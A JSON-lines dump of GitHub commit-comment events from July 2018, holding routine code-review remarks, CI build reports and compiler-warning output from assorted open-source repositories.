{"id":"7964610606","type":"CommitCommentEvent","actor":{"login":"mrjnumber1"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29706097,"position":null,"line":null,"path":null,"commit_id":"dc413a3c572a421406159f70cf070a39f8f28824","created_at":"2018-07-13T22:20:48Z","updated_at":"2018-07-13T22:20:48Z","author_association":"NONE","body":"that's correct, it's been this way for a while."}},"created_at":"2018-07-13T22:20:48Z"}
{"id":"7964613919","type":"CommitCommentEvent","actor":{"login":"IzzySoft"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29706107,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-13T22:21:57Z","updated_at":"2018-07-13T22:21:57Z","author_association":"NONE","body":"Thanks, @albfan! I just checked metadata: looks like I've set it to auto-update already last time, so the next checkupdates run should find it and alert our maintainers. Just ping me when I shall move the repo URLs to point to GitLab."}},"created_at":"2018-07-13T22:21:57Z"}
{"id":"7964619525","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"ncm2/ncm2-jedi"},"payload":{"comment":{"id":29706122,"position":40,"line":40,"path":"pythonx/ncm2_jedi.py","commit_id":"fb5ae2efc90dcd4b9e645b7374c4ce0e9a9983d1","created_at":"2018-07-13T22:23:58Z","updated_at":"2018-07-13T22:23:58Z","author_association":"NONE","body":"@roxma It looks like this has to be a bit more complicated than that to support virtual envs (or conda envs). Consider this: https://github.com/davidhalter/jedi/issues/1147#issuecomment-398145023\r\nhttps://github.com/zchee/deoplete-jedi/blob/master/rplugin/python3/deoplete/sources/deoplete_jedi/server.py"}},"created_at":"2018-07-13T22:23:58Z"}
{"id":"7964620251","type":"CommitCommentEvent","actor":{"login":"filoozom"},"repo":{"name":"chainpoint/chainpoint-node-src"},"payload":{"comment":{"id":29706125,"position":null,"line":null,"path":null,"commit_id":"00127777473393cfec25c1f8afa715d02199ef30","created_at":"2018-07-13T22:24:13Z","updated_at":"2018-07-13T22:24:13Z","author_association":"CONTRIBUTOR","body":"Could you please explain in which circumstances `req.connection.remoteAddress` could be falsy?"}},"created_at":"2018-07-13T22:24:13Z"}
{"id":"7964634531","type":"CommitCommentEvent","actor":{"login":"vrmpx"},"repo":{"name":"pykaldi/pykaldi"},"payload":{"comment":{"id":29706193,"position":67,"line":67,"path":"tools/install_protobuf.sh","commit_id":"e87f05b4298363e8af69cb8690bc29a1f3db3adf","created_at":"2018-07-13T22:29:12Z","updated_at":"2018-07-13T22:29:12Z","author_association":"COLLABORATOR","body":"I don't see a particular reason for having it commented."}},"created_at":"2018-07-13T22:29:12Z"}
{"id":"7964635920","type":"CommitCommentEvent","actor":{"login":"ilya-krol"},"repo":{"name":"maximmag/Test1"},"payload":{"comment":{"id":29706196,"position":23,"line":23,"path":"MoveSpeed.java","commit_id":"16a7d7a41be293bff0e41bd6e0b803a5be946d9e","created_at":"2018-07-13T22:29:43Z","updated_at":"2018-07-13T22:29:43Z","author_association":"NONE","body":"всегда все данные внутри объекта должны быть приватными\r\nсейчас они не приватные и торчат наружу"}},"created_at":"2018-07-13T22:29:43Z"}
{"id":"7964639177","type":"CommitCommentEvent","actor":{"login":"ilya-krol"},"repo":{"name":"maximmag/Test1"},"payload":{"comment":{"id":29706212,"position":4,"line":4,"path":"Value.java","commit_id":"16a7d7a41be293bff0e41bd6e0b803a5be946d9e","created_at":"2018-07-13T22:30:54Z","updated_at":"2018-07-13T22:30:54Z","author_association":"NONE","body":"Если длина метода превышает 7 строк - это значит, что ты что-то написал не так, надо разбивать на отдельные небольшие методы"}},"created_at":"2018-07-13T22:30:54Z"}
{"id":"7964639262","type":"CommitCommentEvent","actor":{"login":"admkakaroto"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29706213,"position":null,"line":null,"path":null,"commit_id":"dc413a3c572a421406159f70cf070a39f8f28824","created_at":"2018-07-13T22:30:56Z","updated_at":"2018-07-13T22:30:56Z","author_association":"CONTRIBUTOR","body":"액셀레이션 MAX Lv : 3 습득조건 : 마도 기어 라이센스 1 계열 : 액티브 / 버프 내용 : 마도 기어의 이동 속도를 일시적으로 증가시킨다. 스킬 사용 시 마도 기어 전용 장비 <가속 장치> 를 장비 혹은 소지해야만 하며, 마도 기어 연료 1 개를 소모한다.\r\n[Level 1] : 지속시간 60 초 [Level 2] : 지속시간 90 초 [Level 3] : 지속시간 120 초 \r\n\r\n-------------------------------------------\r\n이머전시 쿨 MAX Lv : 1 습득조건 : 셀프 디스트럭션 2 계열 : 액티브 / 버프 내용 : 과열 상태의 마도기어를 급속 냉각시킨다. 스킬 사용 시 마도 기어 전용 장비 <냉각 장치> 를 장비 혹은 소지하고 있어야 하며, 마도 기어 연료 1 개를 소모한다. 냉각 장치의 등급이 좋을 수록 감소되는 오버 히트 포인트가 증가된다. \r\n\r\naccording to the kRO it needs to be equipped."}},"created_at":"2018-07-13T22:30:56Z"}
{"id":"7964643164","type":"CommitCommentEvent","actor":{"login":"albireox"},"repo":{"name":"sdss/marvin"},"payload":{"comment":{"id":29706228,"position":null,"line":null,"path":null,"commit_id":"6ed29b935d3efb553460eaabecfee05b5b0084d2","created_at":"2018-07-13T22:32:15Z","updated_at":"2018-07-13T22:32:15Z","author_association":"COLLABORATOR","body":"No, I tried that. Either you leave it as I set it up, which doesn't require second clicks but doesn't activate the GitHub green tick, or you have to live with that, I think."}},"created_at":"2018-07-13T22:32:15Z"}
{"id":"7964645331","type":"CommitCommentEvent","actor":{"login":"dougmassay"},"repo":{"name":"Sigil-Ebook/Sigil"},"payload":{"comment":{"id":29706230,"position":null,"line":null,"path":null,"commit_id":"e7d04a46e87ebbd19a0f71c497a827945828db58","created_at":"2018-07-13T22:32:58Z","updated_at":"2018-07-13T22:32:58Z","author_association":"CONTRIBUTOR","body":"Should be tonight if all goes well. It was rejected last night because there's a buggy situation involving pluralized forms (of which there's now more of to contend with) that we've had to manually tweak in order for Transifex to accept it. It happened last time, too ... we simply forgot about the issue this time."}},"created_at":"2018-07-13T22:32:58Z"}
{"id":"7964646365","type":"CommitCommentEvent","actor":{"login":"rosy1280"},"repo":{"name":"OCFL/spec"},"payload":{"comment":{"id":29706234,"position":null,"line":null,"path":null,"commit_id":"5c78ddef24370b95e733e3966a945c41cc9930a3","created_at":"2018-07-13T22:33:22Z","updated_at":"2018-07-13T22:33:22Z","author_association":"NONE","body":"@awoods i don't have a preference either way (i can see reasons to do both) debate with @OCFL/editors would be good though..."}},"created_at":"2018-07-13T22:33:22Z"}
{"id":"7964647972","type":"CommitCommentEvent","actor":{"login":"Wyqer"},"repo":{"name":"KillahPotatoes/KP-Ranks"},"payload":{"comment":{"id":29706236,"position":null,"line":null,"path":null,"commit_id":"0454fd8c8e9e141a94bd7b6727443086aa947e98","created_at":"2018-07-13T22:33:58Z","updated_at":"2018-07-13T22:33:58Z","author_association":"MEMBER","body":"As a small preview of the dialog (german, as it's localized to the player language)\r\n![20180713192114_1](https://user-images.githubusercontent.com/3811977/42716762-835aec44-86fd-11e8-9200-4baa742fe892.jpg)\r\n"}},"created_at":"2018-07-13T22:33:58Z"}
{"id":"7964649747","type":"CommitCommentEvent","actor":{"login":"RajTheCreater"},"repo":{"name":"RahulKKushwaha/git_sample"},"payload":{"comment":{"id":29706242,"position":1,"line":1,"path":"src/POCO/APIRequest.ts","commit_id":"6a76fdc58ff407538053d393f25a718f1375bab6","created_at":"2018-07-13T22:34:37Z","updated_at":"2018-07-13T22:34:37Z","author_association":"COLLABORATOR","body":"Why This class is renamed?\r\n"}},"created_at":"2018-07-13T22:34:37Z"}
{"id":"7964650040","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29706243,"position":null,"line":null,"path":null,"commit_id":"6a81b8709ddb66bda9c4a93dfc6d36045f3d9495","created_at":"2018-07-13T22:34:42Z","updated_at":"2018-07-13T22:34:42Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-756](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-756).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-756-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T22:34:42Z"}
{"id":"7964651908","type":"CommitCommentEvent","actor":{"login":"RajTheCreater"},"repo":{"name":"RahulKKushwaha/git_sample"},"payload":{"comment":{"id":29706244,"position":9,"line":4,"path":"src/POCO/APIRequest.ts","commit_id":"6a76fdc58ff407538053d393f25a718f1375bab6","created_at":"2018-07-13T22:35:22Z","updated_at":"2018-07-13T22:35:22Z","author_association":"COLLABORATOR","body":"and these additional properties added into class and also modified the constructor?"}},"created_at":"2018-07-13T22:35:22Z"}
{"id":"7964655027","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29706251,"position":null,"line":null,"path":null,"commit_id":"6d039cb969f83bdc79c7e74534f4104eb8d93876","created_at":"2018-07-13T22:36:31Z","updated_at":"2018-07-13T22:36:31Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/84/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/84//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6d039cb969f83bdc79c7e74534f4104eb8d93876/84/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6d039cb969f83bdc79c7e74534f4104eb8d93876/84/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6d039cb969f83bdc79c7e74534f4104eb8d93876/84/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6d039cb969f83bdc79c7e74534f4104eb8d93876/84/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-13T22:36:31Z"}
{"id":"7964655558","type":"CommitCommentEvent","actor":{"login":"cancerberoSgx"},"repo":{"name":"dsherret/ts-simple-ast"},"payload":{"comment":{"id":29706256,"position":6,"line":9,"path":"src/fileSystem/DefaultFileSystemHost.ts","commit_id":"3ac28b758c73dc08cef0ea2dc07565d02dee57ba","created_at":"2018-07-13T22:36:43Z","updated_at":"2018-07-13T22:36:43Z","author_association":"CONTRIBUTOR","body":"didn't knew import can be used as a function call like that. That will solve the problem of fs, globby and their dependencies getting combined in the bundle since imports are transpiled to require() and browserify/webpack will combine bundle those. Although it doesn't break because nobody call them, it adds bytes to the bundle file :) \r\n\r\nI think though the final solution should be not requiring this class at all if user configures the project with another FSH at all - probably using a factory (perhaps it coul dbe the Project?)  and never import this class directly - but not 100% sure if it's an easy refactor. - some notes in my yesterday feedback notes. "}},"created_at":"2018-07-13T22:36:43Z"}
{"id":"7964658026","type":"CommitCommentEvent","actor":{"login":"ednaldomartins"},"repo":{"name":"ednaldomartins/OneMessenger"},"payload":{"comment":{"id":29706260,"position":32,"line":32,"path":"app/google-services.json","commit_id":"c5fd3c45fbe87cb628387160efa1bc0429f3e5f0","created_at":"2018-07-13T22:37:41Z","updated_at":"2018-07-13T22:37:41Z","author_association":"OWNER","body":"`teste`"}},"created_at":"2018-07-13T22:37:41Z"}
{"id":"7964662467","type":"CommitCommentEvent","actor":{"login":"havok2063"},"repo":{"name":"sdss/marvin"},"payload":{"comment":{"id":29706272,"position":null,"line":null,"path":null,"commit_id":"6ed29b935d3efb553460eaabecfee05b5b0084d2","created_at":"2018-07-13T22:39:25Z","updated_at":"2018-07-13T22:39:25Z","author_association":"CONTRIBUTOR","body":"Ok.  Maybe we can live without the green dot.   "}},"created_at":"2018-07-13T22:39:25Z"}
{"id":"7964662571","type":"CommitCommentEvent","actor":{"login":"junaruga"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":29706273,"position":46,"line":101,"path":"dnf/cli/commands/install.py","commit_id":"d79f660af6d5262d25f23931e0620cb9b866d642","created_at":"2018-07-13T22:39:27Z","updated_at":"2018-07-13T22:39:27Z","author_association":"NONE","body":"This check is \r\n`dnf install a b c` => if b does not match, `dnf install` exits as an error status. Right?\r\nThis behavior breaks a compatibility with dnf 2.x."}},"created_at":"2018-07-13T22:39:27Z"}
{"id":"7964663405","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706276,"position":null,"line":null,"path":null,"commit_id":"814372513e0b5ca20e00518737f7c55dc7bf5dbf","created_at":"2018-07-13T22:39:47Z","updated_at":"2018-07-13T22:39:47Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2927 of 2936 tests passed, 115 test warnings)\n\nMessages:\n\n * 97 tests had: AUD diffs.\n * 3 tests had: ERR diffs.\n * 9 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 9 tests had: Table big diffs.\n * 16 tests had: Table small diffs.\n * 1 test had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T22:39:47Z"}
{"id":"7964667095","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706284,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-13T22:41:08Z","updated_at":"2018-07-13T22:41:08Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2314 of 2314 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-13T22:41:08Z"}
{"id":"7964669095","type":"CommitCommentEvent","actor":{"login":"jason-bragg"},"repo":{"name":"dotnet/orleans"},"payload":{"comment":{"id":29706292,"position":null,"line":null,"path":null,"commit_id":"58cd7adbf7eac1e749aa78fc376c0e38c95e7952","created_at":"2018-07-13T22:41:50Z","updated_at":"2018-07-13T22:41:50Z","author_association":"CONTRIBUTOR","body":"The ITransactionParticipantExtension in the wrapper is the grain reference, not the extension implementation.  It allows remote calls to the grain."}},"created_at":"2018-07-13T22:41:50Z"}
{"id":"7964671421","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706294,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-13T22:42:41Z","updated_at":"2018-07-13T22:42:41Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T22:42:41Z"}
{"id":"7964674271","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706301,"position":11,"line":8,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:43:45Z","updated_at":"2018-07-13T22:43:45Z","author_association":"COLLABORATOR","body":"Please remove authorizedUsers list from dxapp.json. \r\nWe will help Ritchie's lab to add these using `dx add users`."}},"created_at":"2018-07-13T22:43:45Z"}
{"id":"7964674395","type":"CommitCommentEvent","actor":{"login":"pierobot"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29706302,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-13T22:43:48Z","updated_at":"2018-07-13T22:43:48Z","author_association":"OWNER","body":"Sorry, I forgot to add inotify extension to the modules you need to install.\r\nJust install the inotify module.\r\n\r\nsudo apt install php7.x-inotify"}},"created_at":"2018-07-13T22:43:48Z"}
{"id":"7964675278","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706304,"position":3,"line":6,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:44:09Z","updated_at":"2018-07-13T22:44:09Z","author_association":"COLLABORATOR","body":"Please make version to \"1.0.0\"."}},"created_at":"2018-07-13T22:44:09Z"}
{"id":"7964677632","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706312,"position":19,"line":30,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:45:02Z","updated_at":"2018-07-13T22:45:02Z","author_association":"COLLABORATOR","body":"\"input_vcf_gz\" -> \"input_vcf_gzs\"\r\nAlso need to update the app script to accordingly for pointing to the variable. "}},"created_at":"2018-07-13T22:45:02Z"}
{"id":"7964678249","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706316,"position":28,"line":40,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:45:15Z","updated_at":"2018-07-13T22:45:15Z","author_association":"COLLABORATOR","body":"\"input_vcf_tbi\" -> \"input_vcf_tbis\"\r\nAlso need to update the app script to accordingly for pointing to the variable. "}},"created_at":"2018-07-13T22:45:15Z"}
{"id":"7964679135","type":"CommitCommentEvent","actor":{"login":"garango241"},"repo":{"name":"Desarrollomypartners/repositorio1"},"payload":{"comment":{"id":29706320,"position":4,"line":2,"path":"hola.txt.txt","commit_id":"a1d81971c3f6bd42cc26f577179f791c77c78368","created_at":"2018-07-13T22:45:35Z","updated_at":"2018-07-13T22:45:35Z","author_association":"CONTRIBUTOR","body":"jesus comentario"}},"created_at":"2018-07-13T22:45:35Z"}
{"id":"7964679819","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706321,"position":70,"line":110,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:45:49Z","updated_at":"2018-07-13T22:45:49Z","author_association":"COLLABORATOR","body":"\"output_vcf_gz\" -> \"output_vcf_gzs\"\r\nAlso need to update the app script to accordingly for pointing to the variable."}},"created_at":"2018-07-13T22:45:49Z"}
{"id":"7964680131","type":"CommitCommentEvent","actor":{"login":"slodki"},"repo":{"name":"moneymanagerex/moneymanagerex"},"payload":{"comment":{"id":29706322,"position":null,"line":null,"path":null,"commit_id":"25879d6a90df5eee5e0044358f90cc63c1cea1d9","created_at":"2018-07-13T22:45:56Z","updated_at":"2018-07-13T22:45:56Z","author_association":"CONTRIBUTOR","body":"@vomikan \r\nCompilation warnings under MSVC:\r\n```\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(633): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(634): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(640): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(641): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(642): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(643): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(644): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(647): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(648): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(649): warning C4129: '/': unrecognized character escape sequence\r\nc:\\projects\\moneymanagerex\\src\\util.cpp(651): warning C4129: '/': unrecognized character escape sequence\r\n```\r\nand under gcc/clang:\r\n```\r\n/moneymanagerex/src/util.cpp: In function 'const std::unordered_map<wxString, wxString>& date_formats_regex()':\r\n/moneymanagerex/src/util.cpp:633:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%d/%m/%y\"] = wxString::Format(\"^%s\\/%s\\/%s%s\", dd, mm, yy, tail);\r\n                                               ^~~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:633:47: warning: unknown escape sequence: '\\/'\r\n/moneymanagerex/src/util.cpp:634:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%d/%m/%Y\"] = wxString::Format(\"^%s\\/%s\\/%s%s\", dd, mm, yyyy, tail);\r\n                                               ^~~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:634:47: warning: unknown escape sequence: '\\/'\r\n/moneymanagerex/src/util.cpp:640:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%d/%m'%Y\"] = wxString::Format(\"^%s\\/%s'%s%s\", dd, mm, yyyy, tail);\r\n                                               ^~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:641:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%d/%m'%y\"] = wxString::Format(\"^%s\\/%s'%s%s\", dd, mm, yy, tail);\r\n                                               ^~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:642:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%d/%m %Y\"] = wxString::Format(\"^%s\\/%s %s%s\", dd, mm, yyyy, tail);\r\n                                               ^~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:643:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%m/%d/%y\"] = wxString::Format(\"^%s\\/%s/%s%s\", mm, dd, yy, tail);\r\n                                               ^~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:644:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%m/%d/%Y\"] = wxString::Format(\"^%s\\/%s/%s%s\", mm, dd, yyyy, tail);\r\n                                               ^~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:647:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%m/%d'%y\"] = wxString::Format(\"^%s\\/%s'%s%s\", mm, dd, yy, tail);\r\n                                               ^~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:648:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%m/%d'%Y\"] = wxString::Format(\"^%s\\/%s'%s%s\", mm, dd, yyyy, tail);\r\n                                               ^~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:649:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%y/%m/%d\"] = wxString::Format(\"^%s\\/%s\\/%s%s\", yy, mm, dd, tail);\r\n                                               ^~~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:649:47: warning: unknown escape sequence: '\\/'\r\n/moneymanagerex/src/util.cpp:651:47: warning: unknown escape sequence: '\\/'\r\n     date_regex[\"%Y/%m/%d\"] = wxString::Format(\"^%s\\/%s\\/%s%s\", yyyy, mm, dd, tail);\r\n                                               ^~~~~~~~~~~~~~~\r\n/moneymanagerex/src/util.cpp:651:47: warning: unknown escape sequence: '\\/'\r\n```"}},"created_at":"2018-07-13T22:45:56Z"}
{"id":"7964680944","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706326,"position":79,"line":119,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:46:13Z","updated_at":"2018-07-13T22:46:13Z","author_association":"COLLABORATOR","body":"\"output_vcf_tbi\" -> \"output_vcftbis\"\r\nAlso need to update the app script to accordingly for pointing to the variable."}},"created_at":"2018-07-13T22:46:13Z"}
{"id":"7964681111","type":"CommitCommentEvent","actor":{"login":"garango241"},"repo":{"name":"Desarrollomypartners/repositorio1"},"payload":{"comment":{"id":29706327,"position":3,"line":3,"path":"hola.txt.txt","commit_id":"34b87a435ebc11d5050f94e096f8cac2fa9ce334","created_at":"2018-07-13T22:46:17Z","updated_at":"2018-07-13T22:46:17Z","author_association":"CONTRIBUTOR","body":"verificado"}},"created_at":"2018-07-13T22:46:17Z"}
{"id":"7964681654","type":"CommitCommentEvent","actor":{"login":"lazarljubenovic"},"repo":{"name":"dsherret/ts-simple-ast"},"payload":{"comment":{"id":29706333,"position":6,"line":9,"path":"src/fileSystem/DefaultFileSystemHost.ts","commit_id":"3ac28b758c73dc08cef0ea2dc07565d02dee57ba","created_at":"2018-07-13T22:46:30Z","updated_at":"2018-07-13T22:46:30Z","author_association":"CONTRIBUTOR","body":"I know it's technicals and nitpicking but seen this comment and just wanted to chime in: `import` is used with paranthesis and looks like a function call but is actually an operator, just like `typeof`. http://2ality.com/2017/01/import-operator.html"}},"created_at":"2018-07-13T22:46:30Z"}
{"id":"7964682672","type":"CommitCommentEvent","actor":{"login":"shikanara"},"repo":{"name":"SuperTeamNo5/bomberman"},"payload":{"comment":{"id":29706337,"position":4,"line":5,"path":"bin/.gitignore","commit_id":"7faa06d8fd9f707c6775741238c87a860df2092d","created_at":"2018-07-13T22:46:56Z","updated_at":"2018-07-13T22:46:56Z","author_association":"CONTRIBUTOR","body":"Fault is here"}},"created_at":"2018-07-13T22:46:56Z"}
{"id":"7964684394","type":"CommitCommentEvent","actor":{"login":"davidmontoyalondono"},"repo":{"name":"Desarrollomypartners/repositorio1"},"payload":{"comment":{"id":29706344,"position":3,"line":3,"path":"hola.txt.txt","commit_id":"34b87a435ebc11d5050f94e096f8cac2fa9ce334","created_at":"2018-07-13T22:47:39Z","updated_at":"2018-07-13T22:47:39Z","author_association":"CONTRIBUTOR","body":"`<h1><b>Listo</b><h1>`"}},"created_at":"2018-07-13T22:47:39Z"}
{"id":"7964685162","type":"CommitCommentEvent","actor":{"login":"tkninja"},"repo":{"name":"MazeOfEncryption/PowerUp-Game"},"payload":{"comment":{"id":29706345,"position":null,"line":null,"path":null,"commit_id":"568a521e25923d2bdcd03831176466d612b66c92","created_at":"2018-07-13T22:47:56Z","updated_at":"2018-07-13T22:47:56Z","author_association":"COLLABORATOR","body":"Oh yeah. Thanks!"}},"created_at":"2018-07-13T22:47:56Z"}
{"id":"7964687776","type":"CommitCommentEvent","actor":{"login":"jimmydief"},"repo":{"name":"salesforce/design-system-react"},"payload":{"comment":{"id":29706357,"position":null,"line":null,"path":null,"commit_id":"8ec0eb35145b8cac2e3f3861a8528596b995c89c","created_at":"2018-07-13T22:49:02Z","updated_at":"2018-07-13T22:49:02Z","author_association":"CONTRIBUTOR","body":"@interactivellama You can probably revert this now that you're using spread everywhere."}},"created_at":"2018-07-13T22:49:02Z"}
{"id":"7964689300","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706360,"position":15,"line":27,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:49:39Z","updated_at":"2018-07-13T22:49:39Z","author_association":"COLLABORATOR","body":"\"whatsNew\": \"\",\r\n->\r\n\"whatsNew\": \"* 1.0.0 First version of the Annotate VCF File app.\""}},"created_at":"2018-07-13T22:49:39Z"}
